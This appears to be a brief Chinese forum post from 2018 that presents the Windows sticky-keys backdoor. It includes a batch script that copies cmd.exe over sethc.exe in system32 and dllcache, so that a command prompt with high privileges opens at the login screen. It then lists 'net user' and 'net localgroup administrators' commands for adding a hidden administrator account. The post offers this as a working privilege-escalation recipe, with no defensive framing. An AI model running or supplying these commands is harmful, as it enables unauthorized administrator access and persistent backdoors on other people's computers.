|
|
大家都知道windows自带粘滞键由连续按5下shift激活对话框(调用c:\system32\sethc.exe),那么想一下 如果我们把sethc.exe换成cmd.exe那么如果在我们未登陆状态时,调用cmd.exe,我们的CMD就具有管理员权限了。
bat:
echo 提权开始......
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
copy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc.exe
echo 提权结束......
然后就可以net user *** *** /add & net localgroup administrators *** *** /add
手动:
将cmd.exe改为sethc.exe,替换c:\windows\system32\dllcache\ 和c:\windows\system32\下的sethc.exe即可。
|
|
发表于 2018-9-1 23:13:29
